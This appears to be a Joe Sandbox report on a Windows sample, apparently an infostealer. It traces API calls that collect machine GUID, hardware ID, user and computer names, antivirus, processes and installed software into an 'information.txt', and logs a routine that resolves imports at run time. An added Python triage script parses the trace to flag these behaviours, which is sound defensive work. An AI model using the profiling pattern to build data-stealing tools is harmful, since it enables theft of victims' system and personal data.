call 190d03 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 190f26 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 190fdc call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 190f8f call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1910ee call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 191167 call 19059c call 190562 call 182920 * 2 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 19147a call 19059c call 190562 call 182920 * 2 call 1905de call 190562 call 182920 call 1905de call 190562 call 182920 call 1911d8 call 19059c call 190562 call 182920 * 2 call 1911d8 call 19059c call 190562 call 182920 * 2 call 1905de call 190562 call 182920 call 181cfd lstrlenA call 1904bc call 196ed9 call 182920 * 2 call 181cde
                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 001904BC: lstrcpyA.KERNEL32(00000000,00000000,?,001970BD,001B66BA,?,?,?,?,001985D1), ref: 001904E2
                                                                                                                                                                          • Part of subcall function 001905DE: lstrlenA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 001905F2
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcpyA.KERNEL32(00000000,?,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 0019061A
                                                                                                                                                                          • Part of subcall function 001905DE: lstrcatA.KERNEL32(?,00000000,?,?,?,?,001970DE,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190625
                                                                                                                                                                          • Part of subcall function 00190562: lstrcpyA.KERNEL32(00000000,?,00000000,001970FC,001B6C20,00000000,001B66BA,?,?,?,?,001985D1), ref: 00190592
                                                                                                                                                                          • Part of subcall function 00190C95: GetProcessHeap.KERNEL32(00000000,00000104,?,Version: ,001B65B6,?,?,?), ref: 00190CAD
                                                                                                                                                                          • Part of subcall function 00190C95: HeapAlloc.KERNEL32(00000000), ref: 00190CB4
                                                                                                                                                                          • Part of subcall function 00190C95: GetLocalTime.KERNEL32(?), ref: 00190CC0
                                                                                                                                                                          • Part of subcall function 00190C95: wsprintfA.USER32 ref: 00190CEB
                                                                                                                                                                          • Part of subcall function 001915A9: _memset.LIBCMT ref: 001915DC
                                                                                                                                                                          • Part of subcall function 001915A9: RegOpenKeyExA.KERNEL32(80000002,SOFTWARE\Microsoft\Cryptography,00000000,00020119,?,?,?,?), ref: 001915FB
                                                                                                                                                                          • Part of subcall function 001915A9: RegQueryValueExA.KERNEL32(?,MachineGuid,00000000,00000000,?,000000FF,?,?,?), ref: 00191620
                                                                                                                                                                          • Part of subcall function 001915A9: RegCloseKey.ADVAPI32(?,?,?,?), ref: 0019162C
                                                                                                                                                                          • Part of subcall function 001915A9: CharToOemA.USER32(?,?), ref: 00191640
                                                                                                                                                                          • Part of subcall function 00191659: GetCurrentHwProfileA.ADVAPI32(?), ref: 00191674
                                                                                                                                                                          • Part of subcall function 00191659: _memset.LIBCMT ref: 001916A3
                                                                                                                                                                          • Part of subcall function 00191659: lstrcatA.KERNEL32(?,00000000,?,?,?,?,?), ref: 001916CB
                                                                                                                                                                          • Part of subcall function 00191659: lstrcatA.KERNEL32(?,001B6ED4,?,?,?,?,?), ref: 001916E8
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcpyA.KERNEL32(00000000,?,0000000C,0019762B,001B66D6), ref: 001905CA
                                                                                                                                                                          • Part of subcall function 0019059C: lstrcatA.KERNEL32(?,?), ref: 001905D4
                                                                                                                                                                          • Part of subcall function 00190977: GetWindowsDirectoryA.KERNEL32(?,00000104,?,?,00000000), ref: 001909AA
                                                                                                                                                                          • Part of subcall function 00190977: GetVolumeInformationA.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00000000), ref: 001909EA
                                                                                                                                                                          • Part of subcall function 00190977: GetProcessHeap.KERNEL32(00000000,00000104,?,?,00000000), ref: 00190A3F
                                                                                                                                                                          • Part of subcall function 00190977: HeapAlloc.KERNEL32(00000000,?,?,00000000), ref: 00190A46
                                                                                                                                                                        • GetCurrentProcessId.KERNEL32(Path: ,001B6884,HWID: ,001B6878,GUID: ,001B686C,00000000,MachineID: ,001B685C,00000000,Date: ,001B6850,001B684C,11.1,Version: ,001B65B6), ref: 00193E1B
                                                                                                                                                                          • Part of subcall function 0019221F: OpenProcess.KERNEL32(00000410,00000000,00193E2A,00000000,?), ref: 00192241
                                                                                                                                                                          • Part of subcall function 0019221F: K32GetModuleFileNameExA.KERNEL32(00000000,00000000,?,00000104), ref: 0019225C
                                                                                                                                                                          • Part of subcall function 0019221F: CloseHandle.KERNEL32(00000000), ref: 00192263
                                                                                                                                                                          • Part of subcall function 00190B05: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00193ED5,Windows: ,001B68A8), ref: 00190B19
                                                                                                                                                                          • Part of subcall function 00190B05: HeapAlloc.KERNEL32(00000000,?,?,?,00193ED5,Windows: ,001B68A8), ref: 00190B20
                                                                                                                                                                          • Part of subcall function 001917DC: __EH_prolog3_catch_GS.LIBCMT ref: 001917E3
                                                                                                                                                                          • Part of subcall function 001917DC: CoInitializeEx.OLE32(00000000,00000000,0000004C,00193F39,Install Date: ,001B68B8,00000000,Windows: ,001B68A8,Work Dir: In memory,001B6890), ref: 001917F4
                                                                                                                                                                          • Part of subcall function 001917DC: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00191805
                                                                                                                                                                          • Part of subcall function 001917DC: CoCreateInstance.OLE32(001B2F00,00000000,00000001,001B2E30,?), ref: 0019181F
                                                                                                                                                                          • Part of subcall function 001917DC: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00191855
                                                                                                                                                                          • Part of subcall function 001917DC: VariantInit.OLEAUT32(?), ref: 001918B0
                                                                                                                                                                          • Part of subcall function 0019196C: __EH_prolog3_catch.LIBCMT ref: 00191973
                                                                                                                                                                          • Part of subcall function 0019196C: CoInitializeEx.OLE32(00000000,00000000,00000030,00193FA7,?,AV: ,001B68CC,Install Date: ,001B68B8,00000000,Windows: ,001B68A8,Work Dir: In memory,001B6890), ref: 00191982
                                                                                                                                                                          • Part of subcall function 0019196C: CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00191993
                                                                                                                                                                          • Part of subcall function 0019196C: CoCreateInstance.OLE32(001B2F00,00000000,00000001,001B2E30,?), ref: 001919AD
                                                                                                                                                                          • Part of subcall function 0019196C: CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 001919E3
                                                                                                                                                                          • Part of subcall function 0019196C: VariantInit.OLEAUT32(?), ref: 00191A32
                                                                                                                                                                          • Part of subcall function 00190C5A: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00181385), ref: 00190C66
                                                                                                                                                                          • Part of subcall function 00190C5A: HeapAlloc.KERNEL32(00000000,?,?,?,00181385), ref: 00190C6D
                                                                                                                                                                          • Part of subcall function 00190C5A: GetComputerNameA.KERNEL32(00000000,00181385), ref: 00190C81
                                                                                                                                                                          • Part of subcall function 00190C28: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,001813B9), ref: 00190C34
                                                                                                                                                                          • Part of subcall function 00190C28: HeapAlloc.KERNEL32(00000000,?,?,?,001813B9), ref: 00190C3B
                                                                                                                                                                          • Part of subcall function 00190C28: GetUserNameA.ADVAPI32(00000000,001813B9), ref: 00190C4F
                                                                                                                                                                          • Part of subcall function 00191538: CreateDCA.GDI32(00000000,00000000,00000000,00000000), ref: 0019154A
                                                                                                                                                                          • Part of subcall function 00191538: GetDeviceCaps.GDI32(00000000,00000008), ref: 00191555
                                                                                                                                                                          • Part of subcall function 00191538: GetDeviceCaps.GDI32(00000000,0000000A), ref: 00191560
                                                                                                                                                                          • Part of subcall function 00191538: ReleaseDC.USER32(00000000,00000000), ref: 0019156B
                                                                                                                                                                          • Part of subcall function 00191538: GetProcessHeap.KERNEL32(00000000,00000104,?,?,001940D8,?,Display Resolution: ,001B68FC,00000000,User Name: ,001B68EC,00000000,Computer Name: ,001B68D8,AV: ,001B68CC), ref: 00191577
                                                                                                                                                                          • Part of subcall function 00191538: HeapAlloc.KERNEL32(00000000,?,?,001940D8,?,Display Resolution: ,001B68FC,00000000,User Name: ,001B68EC,00000000,Computer Name: ,001B68D8,AV: ,001B68CC,Install Date: ), ref: 0019157E
                                                                                                                                                                          • Part of subcall function 00191538: wsprintfA.USER32 ref: 00191590
                                                                                                                                                                          • Part of subcall function 00190DB0: GetKeyboardLayoutList.USER32(00000000,00000000,001B670A,?,?), ref: 00190DE1
                                                                                                                                                                          • Part of subcall function 00190DB0: LocalAlloc.KERNEL32(00000040,00000000), ref: 00190DEF
                                                                                                                                                                          • Part of subcall function 00190DB0: GetKeyboardLayoutList.USER32(00000000,00000000), ref: 00190DFD
                                                                                                                                                                          • Part of subcall function 00190DB0: GetLocaleInfoA.KERNEL32(?,00000002,?,00000200,00000000), ref: 00190E2C
                                                                                                                                                                          • Part of subcall function 00190DB0: LocalFree.KERNEL32(00000000), ref: 00190ED4
                                                                                                                                                                          • Part of subcall function 00190D03: GetProcessHeap.KERNEL32(00000000,00000104,?), ref: 00190D1E
                                                                                                                                                                          • Part of subcall function 00190D03: HeapAlloc.KERNEL32(00000000), ref: 00190D25
                                                                                                                                                                          • Part of subcall function 00190D03: GetTimeZoneInformation.KERNEL32(?), ref: 00190D34
                                                                                                                                                                          • Part of subcall function 00190D03: wsprintfA.USER32 ref: 00190D52
                                                                                                                                                                          • Part of subcall function 00190F26: GetProcessHeap.KERNEL32(00000000,00000104,00000000,?,?,?,00194292,Processor: ,[Hardware],001B6958,00000000,TimeZone: ,001B6948,00000000,Local Time: ,001B6934), ref: 00190F3A
                                                                                                                                                                          • Part of subcall function 00190F26: HeapAlloc.KERNEL32(00000000,?,?,?,00194292,Processor: ,[Hardware],001B6958,00000000,TimeZone: ,001B6948,00000000,Local Time: ,001B6934,Keyboard Languages: ,001B6918), ref: 00190F41
                                                                                                                                                                          • Part of subcall function 00190F26: RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,001B6890,?,?,?,00194292,Processor: ,[Hardware],001B6958,00000000,TimeZone: ,001B6948,00000000,Local Time: ), ref: 00190F5F
                                                                                                                                                                          • Part of subcall function 00190F26: RegQueryValueExA.KERNEL32(001B6890,00000000,00000000,00000000,000000FF,?,?,?,00194292,Processor: ,[Hardware],001B6958,00000000,TimeZone: ,001B6948,00000000), ref: 00190F7B
                                                                                                                                                                          • Part of subcall function 00190F26: RegCloseKey.ADVAPI32(001B6890,?,?,?,00194292,Processor: ,[Hardware],001B6958,00000000,TimeZone: ,001B6948,00000000,Local Time: ,001B6934,Keyboard Languages: ,001B6918), ref: 00190F84
                                                                                                                                                                          • Part of subcall function 00190FDC: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,?), ref: 00191052
                                                                                                                                                                          • Part of subcall function 00190FDC: wsprintfA.USER32 ref: 001910B0
                                                                                                                                                                          • Part of subcall function 00190F8F: GetSystemInfo.KERNEL32(?), ref: 00190FA9
                                                                                                                                                                          • Part of subcall function 00190F8F: wsprintfA.USER32 ref: 00190FC1
                                                                                                                                                                          • Part of subcall function 001910EE: GetProcessHeap.KERNEL32(00000000,00000104,?,Keyboard Languages: ,001B6918,Display Resolution: ,001B68FC,00000000,User Name: ,001B68EC,00000000,Computer Name: ,001B68D8,AV: ,001B68CC,Install Date: ), ref: 00191106
                                                                                                                                                                          • Part of subcall function 001910EE: HeapAlloc.KERNEL32(00000000), ref: 0019110D
                                                                                                                                                                          • Part of subcall function 001910EE: GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00191129
                                                                                                                                                                          • Part of subcall function 001910EE: wsprintfA.USER32 ref: 0019114F
                                                                                                                                                                          • Part of subcall function 0019147A: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,001B670F,?,?), ref: 001914A9
                                                                                                                                                                          • Part of subcall function 0019147A: Process32First.KERNEL32(00000000,00000128), ref: 001914B9
                                                                                                                                                                          • Part of subcall function 0019147A: Process32Next.KERNEL32(00000000,00000128), ref: 00191517
                                                                                                                                                                          • Part of subcall function 0019147A: CloseHandle.KERNEL32(00000000), ref: 00191522
                                                                                                                                                                          • Part of subcall function 001911D8: RegOpenKeyExA.KERNEL32(?,00000000,00020019,?,001B670E,00000000,?,?), ref: 00191248
                                                                                                                                                                          • Part of subcall function 001911D8: RegEnumKeyExA.KERNEL32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 00191285
                                                                                                                                                                          • Part of subcall function 001911D8: wsprintfA.USER32 ref: 001912B2
                                                                                                                                                                          • Part of subcall function 001911D8: RegOpenKeyExA.KERNEL32(?,?,00000000,00020019,?), ref: 001912D1
                                                                                                                                                                          • Part of subcall function 001911D8: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?), ref: 00191307
                                                                                                                                                                          • Part of subcall function 001911D8: lstrlenA.KERNEL32(?), ref: 0019131C
                                                                                                                                                                          • Part of subcall function 001911D8: RegQueryValueExA.KERNEL32(?,00000000,000F003F,?,?,?,001B6E94), ref: 001913B1
                                                                                                                                                                          • Part of subcall function 001911D8: RegCloseKey.ADVAPI32(?), ref: 0019141B
                                                                                                                                                                          • Part of subcall function 001911D8: RegCloseKey.ADVAPI32(?), ref: 00191447
                                                                                                                                                                        • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,Keyboard Languages: ,001B6918,Display Resolution: ,001B68FC,00000000,User Name: ,001B68EC,00000000), ref: 001945A3
                                                                                                                                                                          • Part of subcall function 00196ED9: CreateThread.KERNEL32(00000000,00000000,00196E08,?,00000000,00000000), ref: 00196F78
                                                                                                                                                                          • Part of subcall function 00196ED9: WaitForSingleObject.KERNEL32(00000000,000003E8), ref: 00196F80
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                         • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000003DD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2043302767.00000000003F0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                        • Snapshot File: hcaresult_0_2_180000_aZm1EZ2IYr.jbxd
                                                                                                                                                                        Yara matches
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Heap$Process$Alloc$wsprintf$Close$CreateOpen$InitializeQueryValuelstrcatlstrcpy$InformationLocalNamelstrlen$BlanketCapsCurrentDeviceHandleInfoInitInstanceKeyboardLayoutListProcess32ProxySecurityTimeVariant_memset$CharComputerDirectoryEnumFileFirstFreeGlobalH_prolog3_catchH_prolog3_catch_LocaleLogicalMemoryModuleNextObjectProcessorProfileReleaseSingleSnapshotStatusSystemThreadToolhelp32UserVolumeWaitWindowsZone
                                                                                                                                                                        • String ID: 11.1$AV: $Computer Name: $Cores: $Date: $Display Resolution: $GUID: $HWID: $Install Date: $Keyboard Languages: $Local Time: $MachineID: $Path: $Processor: $RAM: $Threads: $TimeZone: $User Name: $Version: $VideoCard: $Windows: $Work Dir: In memory$[Hardware]$[Processes]$[Software]$information.txt
                                                                                                                                                                        • API String ID: 478979899-3666103263
                                                                                                                                                                        • Opcode ID: a3e5660c5595dfa6f40fe60945a41527f28bc704f853b33611c8f8e03287d6c3
                                                                                                                                                                        • Instruction ID: 549d63bae2069354e43de1cfc24fb5189c2c00b640d1f9c655097840382dbfe3
                                                                                                                                                                        • Opcode Fuzzy Hash: a3e5660c5595dfa6f40fe60945a41527f28bc704f853b33611c8f8e03287d6c3
                                                                                                                                                                        • Instruction Fuzzy Hash: 4C52D231D00529ABDF02FBA4EC429DDB7B4AF29704F5281A1E56177162DB70BF4A8F90

                                                                                                                                                                         Control-flow Graph
                                                                                                                                                                         • 1325: 198685-198695, call 1985dc → 1328, 1329
                                                                                                                                                                         • 1328: 19869b-198881, call 187d47, GetProcAddress * 20 → 1329
                                                                                                                                                                         • 1329: 198886-1988e3, LoadLibraryA * 5 → 1331, 1332
                                                                                                                                                                         • 1331: 1988e5-1988f2, GetProcAddress → 1332
                                                                                                                                                                         • 1332: 1988f7-1988fe → 1334, 1335
                                                                                                                                                                         • 1334: 198929-198930 → 1336, 1337
                                                                                                                                                                         • 1335: 198900-198924, GetProcAddress * 2 → 1334
                                                                                                                                                                         • 1336: 198932-19893f, GetProcAddress → 1337
                                                                                                                                                                         • 1337: 198944-19894b → 1338, 1339
                                                                                                                                                                         • 1338: 19894d-19895a, GetProcAddress → 1339
                                                                                                                                                                         • 1339: 19895f-198966 → 1341, 1342
                                                                                                                                                                         • 1341: 198968-19898c, GetProcAddress * 2 → 1342
                                                                                                                                                                         • 1342: 198991
                                                                                                                                                                        APIs
                                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 001986C6
                                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 001986DD
                                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 001986F4
                                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 0019870B
                                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 00198722
                                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 00198739
                                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 00198750
                                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 00198767
                                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 0019877E
                                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 00198795
                                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 001987AC
                                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 001987C3
                                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 001987DA
                                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 001987F1
                                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 00198808
                                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 0019881F
                                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 00198836
                                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 0019884D
                                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 00198864
                                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 0019887B
                                                                                                                                                                        • LoadLibraryA.KERNEL32(?,00198504), ref: 0019888C
                                                                                                                                                                        • LoadLibraryA.KERNEL32(?,00198504), ref: 0019889D
                                                                                                                                                                        • LoadLibraryA.KERNEL32(?,00198504), ref: 001988AE
                                                                                                                                                                        • LoadLibraryA.KERNEL32(?,00198504), ref: 001988BF
                                                                                                                                                                        • LoadLibraryA.KERNEL32(?,00198504), ref: 001988D0
                                                                                                                                                                        • GetProcAddress.KERNEL32(75A70000,00198504), ref: 001988EC
                                                                                                                                                                        • GetProcAddress.KERNEL32(75290000,00198504), ref: 00198907
                                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 0019891E
                                                                                                                                                                        • GetProcAddress.KERNEL32(75BD0000,00198504), ref: 00198939
                                                                                                                                                                        • GetProcAddress.KERNEL32(75450000,00198504), ref: 00198954
                                                                                                                                                                        • GetProcAddress.KERNEL32(76E90000,00198504), ref: 0019896F
                                                                                                                                                                        • GetProcAddress.KERNEL32 ref: 00198986
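The two API listings above (the host-profiling routine with its Toolhelp32 process walk and registry reads, and this LoadLibraryA/GetProcAddress resolver) are the kind of trace an analyst turns into triage signals. The following Python is an added example, not Joe Sandbox code and not code from the sample: it parses the report's own "API.MODULE(args), ref: ADDR" lines (the sample input is copied from the listings on this page), groups calls by attributed subcall, pulls out the module handles the sample fed to GetProcAddress, and applies two heuristics. The function names, the GetProcAddress threshold and the "LoadLibrary plus GetProcAddress burst" rule are the author's assumptions, not report signatures; TH32CS_SNAPPROCESS = 0x2 is the documented Win32 constant matching the 00000002 flag recorded above.

```python
import re
from collections import Counter
from dataclasses import dataclass
from typing import Optional

# Sample input: API lines copied verbatim from the Joe Sandbox listing on this
# page (subcalls of the host-profiling routine, then part of the import
# resolver). Only a subset is reproduced so the example stays short.
SAMPLE_TRACE = """\
• Part of subcall function 00190D03: GetTimeZoneInformation.KERNEL32(?), ref: 00190D34
• Part of subcall function 00190F26: RegOpenKeyExA.KERNEL32(80000002,00000000,00020119,001B6890,?,?,?,00194292,Processor: ,[Hardware],001B6958,00000000,TimeZone: ,001B6948,00000000,Local Time: ), ref: 00190F5F
• Part of subcall function 00190FDC: GetLogicalProcessorInformationEx.KERNELBASE(0000FFFF,00000000,?), ref: 00191052
• Part of subcall function 001910EE: GlobalMemoryStatusEx.KERNEL32(?,?,00000040), ref: 00191129
• Part of subcall function 0019147A: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,001B670F,?,?), ref: 001914A9
• Part of subcall function 0019147A: Process32First.KERNEL32(00000000,00000128), ref: 001914B9
• Part of subcall function 0019147A: Process32Next.KERNEL32(00000000,00000128), ref: 00191517
• GetProcAddress.KERNEL32 ref: 001986C6
• GetProcAddress.KERNEL32 ref: 001986DD
• GetProcAddress.KERNEL32 ref: 001986F4
• LoadLibraryA.KERNEL32(?,00198504), ref: 0019888C
• LoadLibraryA.KERNEL32(?,00198504), ref: 0019889D
• GetProcAddress.KERNEL32(75A70000,00198504), ref: 001988EC
• GetProcAddress.KERNEL32(75290000,00198504), ref: 00198907
• GetProcAddress.KERNEL32 ref: 0019891E
"""

# One report line: optional "Part of subcall function X:" prefix, then
# API.MODULE, an optional "(args)" group, then ", ref: ADDR".
LINE_RE = re.compile(
    r"^\s*•\s*"
    r"(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r",?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
HEX8_RE = re.compile(r"[0-9A-Fa-f]{8}")
TH32CS_SNAPPROCESS = 0x2  # dwFlags bit that makes CreateToolhelp32Snapshot list processes


@dataclass
class ApiCall:
    api: str
    module: str
    args: list                     # raw argument tokens; "?" = unresolved by the sandbox
    ref: int                       # call-site address
    subcall: Optional[int] = None  # function the report attributes the call to


def parse_trace(text: str) -> list:
    """Parse report lines into ApiCall records; lines that do not match are skipped."""
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        raw = m.group("args")
        args = [a.strip() for a in raw.split(",")] if raw else []
        sub = int(m.group("sub"), 16) if m.group("sub") else None
        calls.append(ApiCall(m.group("api"), m.group("mod"), args, int(m.group("ref"), 16), sub))
    return calls


def api_counts(calls) -> Counter:
    return Counter(c.api for c in calls)


def calls_by_subcall(calls) -> dict:
    """API names grouped by attributed subcall (None = the analysed function itself)."""
    groups = {}
    for c in calls:
        groups.setdefault(c.subcall, []).append(c.api)
    return groups


def resolver_modules(calls) -> set:
    """Non-null module handles the sample passed as hModule to GetProcAddress."""
    handles = set()
    for c in calls:
        if c.api == "GetProcAddress" and c.args and HEX8_RE.fullmatch(c.args[0]):
            if int(c.args[0], 16) != 0:
                handles.add(c.args[0].upper())
    return handles


def is_dynamic_api_resolver(calls, min_getprocaddress: int = 10) -> bool:
    """Triage heuristic (threshold is an assumption): a LoadLibrary* call plus a
    burst of GetProcAddress calls marks a routine resolving imports at run time."""
    counts = api_counts(calls)
    loads = sum(n for name, n in counts.items() if name.startswith("LoadLibrary"))
    return loads > 0 and counts["GetProcAddress"] >= min_getprocaddress


def enumerates_processes(calls) -> bool:
    """True when the Toolhelp32 triad is present and the snapshot flags include TH32CS_SNAPPROCESS."""
    snapshot_ok = any(
        c.api == "CreateToolhelp32Snapshot" and c.args and HEX8_RE.fullmatch(c.args[0])
        and int(c.args[0], 16) & TH32CS_SNAPPROCESS
        for c in calls
    )
    return snapshot_ok and {"Process32First", "Process32Next"} <= {c.api for c in calls}


if __name__ == "__main__":
    calls = parse_trace(SAMPLE_TRACE)
    print(f"{len(calls)} calls parsed; per-API counts: {dict(api_counts(calls))}")
    print("modules handed to GetProcAddress:", sorted(resolver_modules(calls)))
    print("dynamic resolver (>=5 GetProcAddress):", is_dynamic_api_resolver(calls, 5))
    print("process enumeration:", enumerates_processes(calls))
```

Feeding the full listings from this page (rather than the subset embedded above) would make the resolver check fire at the default threshold: the control-flow graph for this function records 20 GetProcAddress calls before the LoadLibraryA block and a further conditional GetProcAddress per loaded module, and the five handles 75A70000, 75290000, 75BD0000, 75450000 and 76E90000 are the values the parser would surface as resolver_modules.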
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000000.00000002.2042684141.0000000000181000.00000080.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                                                                                                                                                         • Associated: 00000000.00000002.2042664621.0000000000180000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042710572.00000000001B0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042727911.00000000001BD000.00000008.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000001DD000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000001E3000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000001E7000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000001F2000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.0000000000201000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000002C9000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.00000000002CF000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.0000000000305000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.000000000030C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.0000000000313000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.000000000031A000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.000000000032B000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.0000000000332000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.0000000000345000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.0000000000351000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.000000000037E000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                         • Associated: 00000000.00000002.2042751229.000000000039F000.00000004.00000001.01000000.00000003.sdmp
